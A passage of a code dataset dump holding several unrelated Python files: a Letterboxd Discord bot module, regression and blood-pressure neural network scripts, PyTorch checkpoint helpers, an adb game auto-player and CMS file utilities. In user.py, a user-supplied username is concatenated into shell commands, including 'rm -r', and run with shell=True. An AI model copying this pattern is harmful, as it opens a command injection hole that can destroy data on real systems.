'https://pic.qiushibaike.com/system/pictures/12437/124375149/medium/00EA4WHMKKPFHTJN.jpg'\n }\n tasks = [asyncio.create_task(fetch(session,url)) for url in url_list]\n await asyncio.wait(tasks)\n\nif __name__ == '__main__':\n asyncio.run(main())","sub_path":"补充知识_异步编程/协程方式下载图片.py","file_name":"协程方式下载图片.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"571060158","text":"import os\nimport subprocess\n\nfrom api import api_call, post_call\nfrom config import SETTINGS\nfrom helpers import create_embed, LetterboxdError\n\n\nasync def user_embed(username):\n username = username.lower()\n url = 'https://letterboxd.com/{}'.format(username)\n lbxd_id = __check_if_fixed_search(username)\n if not lbxd_id:\n lbxd_id = await __search_profile(username)\n member_json = await __get_userjson(lbxd_id)\n display_name, avatar_url, description = await __get_infos(member_json, lbxd_id)\n fav_text, fav_posters_link = __get_favs(member_json)\n description += fav_text\n fav_img_link = ''\n if fav_posters_link:\n fav_img_link = await __upload_fav_posters(username, fav_posters_link)\n return create_embed(display_name, url, description, avatar_url,\n fav_img_link)\n\n\nasync def user_details(username):\n username = username.lower()\n lbxd_id = __check_if_fixed_search(username)\n if not lbxd_id:\n lbxd_id = await __search_profile(username)\n member_json = await __get_userjson(lbxd_id)\n display_name, avatar_url, __ = await __get_infos(member_json, lbxd_id, False)\n return username, display_name, lbxd_id, avatar_url\n\n\ndef __check_if_fixed_search(username):\n for fixed_username, lbxd_id in SETTINGS['fixed_user_search'].items():\n if fixed_username.lower() == username:\n return lbxd_id\n return ''\n\n\nasync def __search_profile(username):\n params = {\n 'input': username.replace('_', ' '),\n 'include': 'MemberSearchItem',\n 'perPage': '100'\n }\n while True:\n response = await api_call('search', params)\n if not response['items']:\n break\n for result in response['items']:\n if result['member']['username'].lower() == username:\n return result['member']['id']\n if response.get('next'):\n params['cursor'] = response['next']\n else:\n break\n raise LetterboxdError('The user **' + username + '** wasn\\'t found.')\n\n\nasync def __get_userjson(lbxd_id):\n member_response = await api_call('member/{}'.format(lbxd_id))\n if member_response == '':\n raise LetterboxdError(\n 'The user wasn\\'t found. ' +\n 'They may have refused to be reachable via the API.')\n return member_response\n\n\nasync def __get_infos(member_json, lbxd_id, with_stats=True):\n display_name = member_json['displayName']\n avatar_url = member_json['avatar']['sizes'][-1]['url']\n description = '**'\n if member_json.get('location'):\n description += member_json['location'] + '** -- **'\n if with_stats:\n stats_json = await api_call('member/{}/statistics'.format(lbxd_id))\n description += str(stats_json['counts']['watches']) + ' films**\\n'\n return display_name, avatar_url, description\n\n\ndef __get_favs(member_json):\n description = ''\n fav_posters_link = list()\n for fav_film in member_json['favoriteFilms']:\n fav_name = fav_film['name']\n if fav_film.get('poster'):\n for poster in fav_film['poster']['sizes']:\n if 150 < poster['width'] < 250:\n fav_posters_link.append(poster['url'])\n if fav_film.get('releaseYear'):\n fav_name += ' (' + str(fav_film['releaseYear']) + ')'\n for link in fav_film['links']:\n if link['type'] == 'letterboxd':\n fav_url = link['url']\n description += '[{0}]({1})\\n'.format(fav_name, fav_url)\n return description, fav_posters_link\n\n\nasync def __upload_fav_posters(username, fav_posters_link):\n # Download posters\n if not os.path.exists(username):\n os.popen('mkdir ' + username)\n img_cmd = 'convert '\n for index, fav_poster in enumerate(fav_posters_link):\n img_data = await api_call(fav_poster, None, False, False)\n temp_fav = '{0}/fav{1}.jpg'.format(username, index)\n img_cmd += temp_fav + ' '\n with open(temp_fav, 'wb') as handler:\n handler.write(img_data)\n\n # Upload to Cloudinary\n img_cmd += '+append {}/fav.jpg'.format(username)\n subprocess.call(img_cmd, shell=True)\n with open('{}/fav.jpg'.format(username), 'rb') as pic:\n bin_pic = pic.read()\n os.popen('rm -r ' + username)\n upload_url = 'https://api.cloudinary.com/v1_1/'\n upload_url += SETTINGS['cloudinary']['cloud_name'] + '/image/upload'\n params = {'file': bin_pic,\n 'upload_preset': SETTINGS['cloudinary']['preset']}\n result = await post_call(upload_url, params)\n return result['url']\n","sub_path":"user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"63756285","text":"import pandas as pd\r\nimport numpy as np\r\nimport math\r\nimport csv\r\nimport sys\r\nimport matplotlib.pyplot as plt\r\nfrom lineaRegression import LineaRegression\r\n\r\n#command line argument variables\r\ntrainData = sys.argv[1]\r\ntestData = sys.argv[2]\r\n\r\n#Add the Labels\r\nhouse_train = pd.read_csv(trainData, names =['CRIM','ZIN','INDUS','CHAS','NOX','RM','AGE','DIS','RAD','TAX','PIRATIO','B','LSTAT','MEDV'] )\r\nhouse_test = pd.read_csv(testData, names =['CRIM','ZIN','INDUS','CHAS','NOX','RM','AGE','DIS','RAD','TAX','PIRATIO','B','LSTAT','MEDV'] )\r\n\r\n#setting up python lists for plotting\r\ntrainX = [2, 4, 6, 8, 10, 12, 14, 16, 18, 20]\r\ntestX = [2, 4, 6, 8, 10, 12, 14, 16, 18, 20]\r\ntrainY = []\r\ntestY = []\r\nd = 2\r\nwhile d <= 20:\r\n\r\n #insert our 2 random sampled rows\r\n s1 = np.random.normal(0, 0.1, len(house_train.index))\r\n s2 = np.random.normal(0, 0.1, len(house_train.index))\r\n house_train.insert(0, \"\", s1, True)\r\n house_train.insert(0, \"\", s2, True)\r\n s1 = np.random.normal(0, 0.1, len(house_test.index))\r\n s2 = np.random.normal(0, 0.1, len(house_test.index))\r\n house_test.insert(0, \"\", s1, True)\r\n house_test.insert(0, \"\", s2, True)\r\n\r\n # Selecting all but last column of data frame with all rows\r\n x_train = house_train.iloc[:,0:-1].values\r\n x_test = house_test.iloc[:,0:-1].values\r\n\r\n # Selecting last column of data frame for train/test data as matrix\r\n y_train = (np.matrix(house_train.iloc[:,-1].values, dtype=float)).T\r\n y_test = (np.matrix(house_test.iloc[:,-1].values, dtype=float)).T\r\n\r\n #Do the Calculation\r\n output = LineaRegression(np.matrix(x_train), y_train)\r\n output2 = LineaRegression(np.matrix(x_test), y_test)\r\n\r\n trainY.append(output.ase())\r\n testY.append(output2.ase())\r\n\r\n d = d + 2\r\n\r\n#plot graphs\r\nplt.plot(trainX, trainY)\r\nplt.xlabel('d')\r\nplt.ylabel('ASE')\r\nplt.title('Training ASE over different d')\r\nplt.show()\r\n\r\nplt.plot(testX, testY)\r\nplt.xlabel('d')\r\nplt.ylabel('ASE')\r\nplt.title('Testing ASE over different D')\r\nplt.show()\r\n","sub_path":"q1_4.py","file_name":"q1_4.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"358439637","text":"import random\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nimport torch.backends.cudnn as cudnn\nimport os\nimport sys\nfrom distutils.dir_util import copy_tree\nimport aws_utils\nimport pickle\nimport logging\nfrom copy import deepcopy\n\n\nclass RNGSeed:\n def __init__(self, seed, deterministic=True):\n self.seed = seed\n self.deterministic = deterministic\n self.set_random_seeds()\n\n def set_random_seeds(self):\n seed = self.seed\n random.seed(seed)\n np.random.seed(seed)\n cudnn.enabled = True\n\n if self.deterministic:\n cudnn.benchmark = False\n cudnn.deterministic = True\n else:\n cudnn.benchmark = True\n\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n\n def get_save_states(self):\n rng_states = {\n \"random_state\": random.getstate(),\n \"np_random_state\": np.random.get_state(),\n \"torch_random_state\": torch.get_rng_state(),\n \"torch_cuda_random_state\": torch.cuda.get_rng_state_all(),\n }\n return rng_states\n\n def load_states(self, rng_states):\n random.setstate(rng_states[\"random_state\"])\n np.random.set_state(rng_states[\"np_random_state\"])\n torch.set_rng_state(rng_states[\"torch_random_state\"])\n torch.cuda.set_rng_state_all(rng_states[\"torch_cuda_random_state\"])\n\n\ndef save(\n folder,\n epochs,\n rng_seed,\n model,\n optimizer,\n history=None,\n s3_bucket=None,\n):\n\n checkpoint = {\n \"epochs\": epochs,\n \"rng_seed\": rng_seed.get_save_states(),\n \"optimizer\": optimizer.state_dict(),\n \"model\": model.state_dict(),\n \"arch_params\": model._modules['module']._arch_parameters\n }\n\n ckpt = os.path.join(folder, \"model.ckpt\")\n torch.save(checkpoint, ckpt)\n\n if history is not None:\n history_file = os.path.join(folder, \"history.pkl\")\n with open(history_file, \"wb\") as f:\n pickle.dump(history, f)\n\n log = os.path.join(folder, \"log.txt\")\n\n if s3_bucket is not None:\n aws_utils.upload_to_s3(ckpt, s3_bucket, ckpt)\n aws_utils.upload_to_s3(log, s3_bucket, log)\n if history is not None:\n aws_utils.upload_to_s3(history_file, s3_bucket, history_file)\n\ndef load(folder, rng_seed, model, optimizer, s3_bucket=None):\n # Try to download log and ckpt from s3 first to see if a ckpt exists.\n ckpt = os.path.join(folder, \"model.ckpt\")\n history_file = os.path.join(folder, \"history.pkl\")\n history = None\n\n if s3_bucket is not None:\n aws_utils.download_from_s3(ckpt, s3_bucket, ckpt)\n try:\n aws_utils.download_from_s3(history_file, s3_bucket, history_file)\n except:\n logging.info(\"history.pkl not in s3 bucket\")\n\n if os.path.exists(history_file):\n with open(history_file, \"rb\") as f:\n history = pickle.load(f)\n\n checkpoint = torch.load(ckpt)\n\n epochs = checkpoint[\"epochs\"]\n rng_seed.load_states(checkpoint[\"rng_seed\"])\n model.load_state_dict(checkpoint[\"model\"])\n optimizer.load_state_dict(checkpoint[\"optimizer\"])\n module = model.module\n params = [\n module.alphas_normal,\n module.alphas_reduce,\n module.betas_normal,\n module.betas_reduce,\n ]\n \n for p, s in zip(params, checkpoint['arch_params']):\n p = s\n\n logging.info(\"Resumed model trained for %d epochs\" % epochs)\n\n return epochs, history\n\n","sub_path":"train_utils.py","file_name":"train_utils.py","file_ext":"py","file_size_in_byte":3500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"279722496","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport time\n \nclass Timer(object):\n def __init__(self, start_time=time.time(), limit=100):\n self.start_time = start_time\n self.limit = limit\n \n def __call__(self, step, mess='', prints=True):\n if prints and (step % self.limit != 0) and (step > 10):\n return\n message = '[%8d][%s] %s' % (step, hms(self.start_time), mess)\n if prints:\n print(message)\n else:\n return message\n \n\ndef hms(start_time):\n t = int(time.time() - start_time)\n m, s = t//60, t % 60\n h, m = m//60, m % 60\n if h > 0:\n return '%2dh%02dm%02ds' % (h, m, s)\n elif m > 0:\n return '%5dm%02ds' % (m, s)\n else:\n return '%8ds' % s","sub_path":"image_generation/utils/timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"39621447","text":"import cv2\nimport numpy as np\nimport math\nimport subprocess\nimport sys\nimport random\nimport os\nimport time\n\nSTART_OFFSET = 2 / 3\nCOEFF = 185\n\n\ndef getScreenshot(screenshotPath):\n process = subprocess.Popen(\n 'adb shell screencap -p', shell=True, stdout=subprocess.PIPE)\n screenshot = process.stdout.read()\n if sys.platform == 'win32':\n screenshot = screenshot.replace(b'\\r\\n', b'\\n')\n f = open(screenshotPath, 'wb')\n f.write(screenshot)\n f.close()\n\n\ndef press(time):\n command = 'adb shell input swipe {x1} {y1} {x2} {y2} {duration}'.format(\n x1=random.randint(0, 1080),\n y1=random.randint(0, 1920),\n x2=random.randint(0, 1080),\n y2=random.randint(0, 1920),\n duration=round(time)\n )\n os.system(command)\n\n\ndef getDistance(screenshotPath):\n screenshot = cv2.imread(screenshotPath)\n hsvScreenshot = cv2.cvtColor(screenshot, cv2.COLOR_BGR2HSV)\n\n penguinMask = cv2.inRange(hsvScreenshot, np.array(\n [0, 2, 30]), np.array([175, 35, 65]))\n cv2.imwrite(\"penguin_mask.png\", penguinMask)\n\n possiblePenguinBottomYWithW = []\n tempW = 1\n preAppend = []\n for i, j in enumerate(penguinMask):\n if (j == 255).any():\n if (penguinMask[i - 1] != 255).all():\n preAppend.append(i)\n if (penguinMask[i + 1] != 255).all():\n preAppend = preAppend + [i, tempW]\n possiblePenguinBottomYWithW.append(preAppend)\n tempW = 1\n preAppend = []\n else:\n tempW = tempW + 1\n\n for i in possiblePenguinBottomYWithW:\n print(\"Penguin: Possible Y: Start:\",\n i[0], \"End:\", i[1], \"Weight:\", i[2])\n\n def getW(elem): return elem[-1]\n possiblePenguinBottomYWithW.sort(key=getW, reverse=True)\n penguinBottomY = possiblePenguinBottomYWithW[0][1]\n penguinHeight = penguinBottomY - possiblePenguinBottomYWithW[0][0]\n print(\"Penguin: Selected Y:\", penguinBottomY)\n print(\"Penguin: Height:\", penguinHeight)\n\n possiblePenguinBottomX = np.where(penguinMask[penguinBottomY] == 255)[0]\n for i in possiblePenguinBottomX:\n print(\"Penguin: Possible X:\", i)\n\n penguinBottomX = possiblePenguinBottomX[round(\n len(possiblePenguinBottomX)/2)]\n print(\"Penguin: Selected X:\", penguinBottomX)\n\n startCenterX = penguinBottomX\n startCenterY = penguinBottomY - round(penguinHeight / 15)\n\n print(\"Start Center:\", startCenterX, startCenterY)\n\n endMask = cv2.inRange(hsvScreenshot, np.array(\n [0, 180, 255]), np.array([1, 195, 255]))\n cv2.imwrite(\"end_mask.png\", endMask)\n\n possibleEndBottomYWithW = []\n tempW = 1\n for i, j in enumerate(endMask):\n if (j == 255).any():\n if (endMask[i + 1] != 255).all():\n possibleEndBottomYWithW.append([i, tempW])\n tempW = 1\n else:\n tempW = tempW + 1\n\n for i in possibleEndBottomYWithW:\n print(\"End: Possible Y:\", i[0], \"Weight:\", i[1])\n\n possibleEndBottomYWithW.sort(key=getW, reverse=True)\n for i, j in enumerate(possibleEndBottomYWithW):\n try:\n if abs(j[1] - possibleEndBottomYWithW[i + 1][1]) < 3:\n if j[0] < possibleEndBottomYWithW[i + 1][0]:\n possibleEndBottomYWithW.pop(i + 1)\n else:\n possibleEndBottomYWithW.pop(i)\n except:\n continue\n\n endBottomY = possibleEndBottomYWithW[0][0]\n print(\"End: Selected Y:\", endBottomY)\n\n possibleEndBottomX = np.where(endMask[endBottomY] == 255)[0]\n for i in possibleEndBottomX:\n print(\"End: Possible X:\", i)\n\n endBottomX = possibleEndBottomX[round(\n len(possibleEndBottomX)/2)]\n print(\"End: Selected X:\", endBottomX)\n\n endCenterX = endBottomX\n endCenterY = endBottomY - round(penguinHeight * 1 / 8)\n\n print(\"End Center:\", endCenterX, endCenterY)\n\n distance = math.sqrt((endCenterX - startCenterX)\n ** 2 + (endCenterY - startCenterY) ** 2) / penguinHeight\n print(\"Distance:\", distance)\n\n return distance\n\n\ndef main():\n while True:\n input()\n getScreenshot(\"screenshot.png\")\n press((getDistance(\"screenshot.png\") - START_OFFSET) * COEFF)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"82457884","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.datasets import make_regression\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\nfrom keras.models import Sequential\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom keras.optimizers import SGD, Adam\nfrom keras.constraints import maxnorm\nfrom keras.layers import Dense, Conv2D, MaxPooling2D\nfrom ast import literal_eval\nimport my_functions\nfrom operator import add\nfrom itertools import chain\nfrom sklearn.decomposition import PCA\nfrom sklearn.model_selection import KFold\nnp.set_printoptions(threshold=np.inf)\n\ndf = pd.read_csv('Data/residual_dataset_new.csv', header=0)\ndf.reset_index(drop=True,inplace=True)\n\n# Model configuration\nbatch_size = 5\nloss_function = 'mean_squared_error'\nno_epochs = 100\noptimizer = Adam(lr=0.001)\nids = []\ntesting_pers =[]\ntesting_lables = []\ntesting_post_MM = []\ntesting_post_true = [] \ntesting_id = []\nevaluating_pers = []\nevaluating_lables = []\nevaluating_post_MM = []\nevaluating_post_true = []\nevaluating_id = []\n\ndef get_data():\n\n training_set = []\n lables = []\n post_ts_MM = []\n post_ts_true = []\n pre_ts_true = []\n\n for index, row in df.iterrows():\n if sum(literal_eval(df.true_post_finger_pressure_cycle[index])) == 0:\n continue\n if (df.roottable_case_id_text.values[index]) == 217:\n testing_pers.append([df.roottable_age_value.values[index], df.roottable_sex_item.values[index], df.clinical_visits_body_mass_index_value.values[index], df.clinical_visits_cpet_vo2max_value.values[index],\n df.clinical_visits_pre_24h_dbp_mean_value.values[index], df.clinical_visits_pre_24h_sbp_mean_value.values[index], df.exercise_value.values[index]])\n testing_lables.append(literal_eval(df.estimate_error[index]))\n testing_post_MM.append(literal_eval(df.mm_post_finger_pressure_cycle[index]))\n testing_post_true.append(literal_eval(df.true_post_finger_pressure_cycle[index]))\n testing_id.append(df.roottable_case_id_text.values[index])\n elif (df.roottable_case_id_text.values[index]) == 67:\n evaluating_pers.append([df.roottable_age_value.values[index], df.roottable_sex_item.values[index], df.clinical_visits_body_mass_index_value.values[index], df.clinical_visits_cpet_vo2max_value.values[index],\n df.clinical_visits_pre_24h_dbp_mean_value.values[index], df.clinical_visits_pre_24h_sbp_mean_value.values[index], df.exercise_value.values[index]])\n evaluating_lables.append(literal_eval(df.estimate_error[index]))\n evaluating_post_MM.append(literal_eval(df.mm_post_finger_pressure_cycle[index]))\n evaluating_post_true.append(literal_eval(df.true_post_finger_pressure_cycle[index]))\n evaluating_id.append(df.roottable_case_id_text.values[index])\n else:\n training_set.append([df.roottable_age_value.values[index], df.roottable_sex_item.values[index], df.clinical_visits_body_mass_index_value.values[index], df.clinical_visits_cpet_vo2max_value.values[index],\n df.clinical_visits_pre_24h_dbp_mean_value.values[index], df.clinical_visits_pre_24h_sbp_mean_value.values[index], df.exercise_value.values[index]])\n lables.append(literal_eval(df.estimate_error[index]))\n post_ts_MM.append(literal_eval(df.mm_post_finger_pressure_cycle[index]))\n post_ts_true.append(literal_eval(df.true_post_finger_pressure_cycle[index]))\n pre_ts_true.append(literal_eval(df.pre_finger_pressure_cycle[index]))\n ids.append(df.roottable_case_id_text.values[index])\n\n x_values = pd.DataFrame(training_set).values\n y_all = lables \n\n ts = [] \n ts.extend(pre_ts_true)\n ts.extend(post_ts_true)\n ts = np.array(ts)\n mean_ts = my_functions.make_mean_vector(ts)\n ts_wo_mean = my_functions.subtract_mean_from_post_ts_data(ts, mean_ts)\n mean_vector_pre = my_functions.make_mean_vector(pre_ts_true)\n pre_ts_wo_mean = my_functions.subtract_mean_from_post_ts_data(pre_ts_true, mean_vector_pre)\n\n # PCA\n pca_model = PCA(0.95)\n pca_model.fit(ts_wo_mean)\n loadings = pca_model.transform(pre_ts_wo_mean) # number of components: 4\n\n min_max_scaler = MinMaxScaler()\n x_norm = min_max_scaler.fit_transform(x_values)\n y_all = np.array(y_all)\n\n train_x = np.array(x_norm)\n train_y = np.array(y_all)\n\n return train_x, train_y, post_ts_MM, post_ts_true, min_max_scaler \ntrain_x, train_y, post_ts_MM, post_ts_true, min_max_scaler = get_data()\nprint('Predicting for person with trial ID: ', evaluating_id[0])\n\ndef create_model():\n ### FUNCTIONAL API MODEL ###\n inputs = keras.Input(shape=(7,))\n dense1 = layers.Dense(50, activation=\"relu\")(inputs)\n dense2 = layers.Dense(100, activation=\"relu\")(dense1)\n dense3 = layers.Dense(150, activation=\"relu\")(dense2)\n outputs = layers.Dense(100)(dense3)\n model = keras.Model(inputs=inputs, outputs=outputs)\n\n model.compile(loss=loss_function, optimizer=optimizer)\n\n return model\n# model = create_model()\n\ndef fit_model(model):\n history = model.fit(train_x, train_y, epochs=no_epochs, batch_size=batch_size, verbose=0)\n\n # Evaluate the model\n # train_mse = model.evaluate(train_x, train_y, verbose=0)\n # test_mse = model.evaluate(test_x, test_y, verbose=0)\n # print('Train loss: %.3f, Test: %.3f' % (train_mse, test_mse))\n\n return model\n# model = fit_model()\n\ndef create_model_saved_weights():\n inputs = keras.Input(shape=(7,))\n dense1 = layers.Dense(50, activation=\"relu\")(inputs)\n dense2 = layers.Dense(100, activation=\"relu\")(dense1)\n dense3 = layers.Dense(150, activation=\"relu\")(dense2)\n outputs = layers.Dense(100)(dense3)\n model = keras.Model(inputs=inputs, outputs=outputs)\n\n model.compile(loss=loss_function, optimizer=optimizer)\n\n model.load_weights(\"Data/residual_weights_real_pat_\" + str(evaluating_id[0]))\n\n # model.summary()\n\n return model\n\n## TESTING ##\ndef predict(predict_pers_x, predict_pers_y, model, post_ts_MM, post_ts_true, i):\n predict_pers_xx = predict_pers_x.reshape(predict_pers_x.shape[0], 1)\n prediction = model.predict(predict_pers_xx.T)\n \n adding_prediction = [b - a for a, b in zip(prediction[0], post_ts_MM[0])]\n\n if i == 1:\n plt.plot(prediction[0], 'g')\n plt.plot(predict_pers_y[0], 'b')\n plt.show()\n\n plt.plot(adding_prediction, color='darkorange', label = 'Prediction')\n plt.plot(post_ts_true[0], color='midnightblue', label= 'True curve')\n plt.plot(post_ts_MM[0], color='crimson', label='Mechanistic model estimate')\n plt.legend()\n plt.title('Residual model with real data')\n plt.xlabel('Time points [-]')\n plt.ylabel('Blood pressure [mmHg]')\n plt.gcf().set_dpi(200)\n plt.show()\n\n # Calculate erorrs\n dbp = min(adding_prediction)\n sbp = max(adding_prediction)\n pp = sbp-dbp\n MAP = np.mean(adding_prediction)\n dbp_true = min(post_ts_true[0])\n sbp_true = max(post_ts_true[0])\n pp_true = sbp_true-dbp_true\n MAP_true = np.mean(post_ts_true[0])\n\n point_error = abs(prediction[0]-predict_pers_y[0])\n total_cycle_error = sum(abs(prediction[0]-predict_pers_y[0]))\n dbp_error = abs(dbp-dbp_true)\n sbp_error = abs(sbp-sbp_true)\n pp_error = abs(pp-pp_true)\n MAP_error = abs(MAP-MAP_true)\n\n print('Point error = ', np.mean(point_error), np.std(point_error))\n print('DBP error = ', np.mean(dbp_error), np.std(dbp_error))\n print('SBP error = ', np.mean(sbp_error), np.std(sbp_error))\n print('PP error = ', np.mean(pp_error), np.std(pp_error))\n print('MAP error = ', np.mean(MAP_error), np.std(MAP_error))\n print('Total error = ', np.mean(total_cycle_error), np.std(total_cycle_error))\n\n return np.mean(total_cycle_error)\n# error = predict()\n\n\n## RUN SEVERAL TIMES AND SAVE THE BEST MODEL ##\n'''\nbest_error = 4000\nevaluating_pers = np.array(evaluating_pers) \nevaluating_pers = min_max_scaler.transform(evaluating_pers)\nfor i in range(30):\n model_eval = create_model()\n model_fitted = fit_model(model_eval)\n error = predict(evaluating_pers.T, evaluating_lables, model_fitted, evaluating_post_MM, evaluating_post_true, 0)\n print('Iteration: ', i, ' with error: ', error)\n if error < best_error:\n print('New best error on number ', i,'. Error = ', error)\n model_fitted.save_weights('Data/residual_weights_real_pat_' + str(evaluating_id[0]))\n best_error = error\nprint('The best achieved error for ', evaluating_id[0], ' was: ', best_error)\n'''\n\n## EVALUATE ON THE PERSON LEFT OUT ##\ntesting_pers = np.array(testing_pers) \ntesting_pers = min_max_scaler.transform(testing_pers)\ntesting_lables = np.array(testing_lables)\nmodel_test = create_model_saved_weights()\nprint('Testing on person with trial ID: ', testing_id[0])\nprint(testing_pers.T)\nerror1 = predict(testing_pers.T, testing_lables, model_test, testing_post_MM, testing_post_true, 1)\n","sub_path":"Models/residual_real_model.py","file_name":"residual_real_model.py","file_ext":"py","file_size_in_byte":9037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"475669873","text":"# coding:utf8\n\nimport re\nfrom os import path\nfrom util.utils import get_string\nfrom util.log import warn\nfrom traceback import format_exc\nfrom util.redis_cache import get_cache, set_cache, del_cache\nimport os\nfrom settings_cms import REDIS_CONFIG, COOKIE_KEY, BASE_DIR, USE_CUSTOM_SETTING\n\n_base_path = path.join(BASE_DIR, 'ui', USE_CUSTOM_SETTING)\nimport shutil\nfrom settings_cms import USER_FILES_PATH, STATIC_FILES_PATH\nimport json\nfrom distutils import dir_util\nfrom util.config_utils import *\nfrom datetime import datetime\n\n\ndef get_abs_file_path_and_new_file_path(file_path):\n file_path = '/'.join(file_path.split('/')[1:])\n file_name = file_path.split('/')[-1].split('.')[0]\n file_ext = file_path.split('/')[-1].split('.')[1]\n new_file_name = file_name + '_old.' + file_ext\n f_list = file_path.split('/')[:-1]\n f_list.append(new_file_name)\n new_file_path = '/'.join(f_list)\n return path.join(_base_path, file_path), path.join(_base_path, new_file_path)\n\n\ndef parse_filename(file_path):\n basename = os.path.basename(file_path)\n filename, file_extension = os.path.splitext(basename)\n dirname = os.path.dirname(file_path)\n return dirname, filename, file_extension\n\n\ndef backup_file(file_path):\n basename = os.path.basename(file_path)\n dirname = os.path.dirname(file_path)\n filename, file_extension = os.path.splitext(basename)\n old_filename = ''.join([filename + \"_old\", file_extension])\n old_path = os.path.join(dirname, old_filename)\n if os.path.exists(file_path):\n shutil.copy(file_path, old_path)\n return True\n\n\ndef get_file_list(user, folder):\n res = {'success': False, 'data': '', 'message': '操作失败', 'user': user}\n if not user or not folder:\n return res\n folder_path = os.path.join(USER_FILES_PATH, user, folder)\n _files = os.listdir(folder_path)\n files = [os.path.join('/static', folder, x) for x in _files if \"_old.\" not in x]\n res.update({'data': files})\n res = {'success': True, 'data': '', 'message': '操作成功', 'user': user}\n return json.dumps(res)\n\n\ndef copy_static_files(user, source_path):\n tmp_path = source_path.replace(STATIC_FILES_PATH, '')\n path_suffix = os.path.join(*[x for x in tmp_path.split('/') if x])\n path_prefix = os.path.join(USER_FILES_PATH, user)\n target_path = os.path.join(path_prefix, path_suffix)\n if not os.path.exists(source_path):\n return False\n folder = os.path.dirname(target_path)\n if not os.path.exists(folder):\n os.makedirs(folder)\n shutil.copy(source_path, target_path)\n return True\n\n\ndef concate_path(prefix, suffix, junction=None):\n if not junction:\n junction = [x for x in prefix.split(os.sep) if x][-1]\n suffix_list = [x for x in suffix.split(os.sep) if x]\n idx = 0\n if junction in suffix_list:\n idx = suffix_list.index(junction) + 1\n _suffix = os.path.join(*suffix_list[idx:])\n absolute_path = os.path.join(prefix, _suffix)\n return absolute_path\n\n\ndef map_to_user_folder(user, source_path):\n \"\"\"\n 公共的模板路径对应至用户文件夹\n :param user:\n :param source_path:\n :return:\n \"\"\"\n _suffix = os.path.join(*source_path.replace(STATIC_FILES_PATH, '').split(os.sep))\n target_path = os.path.join(USER_FILES_PATH, user, _suffix)\n return target_path\n\n\ndef parse_category(absolute_path, identifier=\"web/html\", is_html=True):\n splits = os.path.join(*[x for x in absolute_path.split(identifier)[-1].split(os.sep) if x])\n if is_html:\n catetory = os.path.dirname(splits)\n else:\n catetory = os.path.join(*splits.rsplit('.', 1)[:-1])\n return catetory\n\n\ndef get_links(path):\n \"\"\"\n 获取指定文件夹下,文件的访问链接\n :param path:\n :return:\n \"\"\"\n static_files = ['html', 'css', 'js', 'images', 'web', 'app']\n absolute_path_list = []\n urls = []\n for (dir_path, a, files) in os.walk(path):\n if files:\n absolute_path_list.extend([os.path.join(dir_path, x) for x in files])\n for apl in absolute_path_list:\n if apl.startswith(USER_FILES_PATH):\n apl = apl.replace(USER_FILES_PATH, '')\n apl_list = [x for x in apl.split('/') if x][1:]\n else:\n apl = apl.replace(STATIC_FILES_PATH, '')\n apl_list = [x for x in apl.split('/') if x]\n _url = os.path.join('/static', *apl_list)\n if _url.endswith('html'):\n urls.append(_url)\n return urls\n\n\ndef get_absolute_path_by_url(_url, user=None):\n \"\"\"\n 根据模板的链接获取模板所在的文件路径\n :param _url:\n :param user:\n :return:\n \"\"\"\n if user:\n path_prefix = os.path.join(USER_FILES_PATH, user)\n else:\n path_prefix = STATIC_FILES_PATH\n if _url.startswith('/static/') or _url.startswith('static/'):\n path_suffix = os.path.join(*[x for x in _url.split('/') if x][1:])\n path = os.path.join(path_prefix, path_suffix)\n if not os.path.exists(path):\n path = os.path.join(STATIC_FILES_PATH, path_suffix)\n if not os.path.exists(path):\n return ''\n return path\n\n\ndef related_static_files(html_path):\n pass\n\n\ndef copy_templates_by_config(user, config_file):\n paths = []\n config = get_config(user, config_file)\n if not config or not user:\n return {\"success\": False, \"info\": \"模板不存在\", 'user': user}\n try:\n pages = config['web_module'].keys()\n modules = config['web_module']['index']['body']\n for ms in modules:\n link = ms.values()[0]['url']\n absolute_path = get_absolute_path_by_url(link)\n if os.path.exists(absolute_path):\n paths.append(absolute_path)\n target_path = map_to_user_folder(user, absolute_path)\n copy_with_create_dir(absolute_path, target_path) # 复制模板\n module_file_name = os.path.splitext(os.path.basename(absolute_path))[0]\n\n # 复制图片\n images_folder = os.path.join(STATIC_FILES_PATH, 'images', parse_category(absolute_path),\n module_file_name)\n if os.path.exists(images_folder):\n copy_folder(images_folder, map_to_user_folder(user, images_folder))\n # 复制css文件\n css_folder = os.path.join(STATIC_FILES_PATH, 'css')\n if os.path.exists(css_folder):\n copy_folder(css_folder, map_to_user_folder(user, css_folder))\n # 复制js文件\n js_folder = os.path.join(STATIC_FILES_PATH, 'js')\n if os.path.exists(js_folder):\n copy_folder(js_folder, map_to_user_folder(user, js_folder))\n res = {\"success\": True, \"message\": \"操作成功\"}\n except Exception as e:\n res = {\"success\": False, \"message\": \"操作失败\", \"info\": str(e)}\n return res\n\n\n\"\"\"\ncopy\n\"\"\"\n\n\ndef copy_with_create_dir(source, target):\n if not os.path.exists(source):\n return False\n\n folder = os.path.dirname(target)\n if not os.path.exists(folder):\n os.makedirs(folder)\n shutil.copy(source, target)\n return True\n\n\ndef copy_by_paths(paths, to_dir):\n try:\n if not os.path.exists(to_dir):\n os.makedirs(to_dir)\n for p in paths:\n if 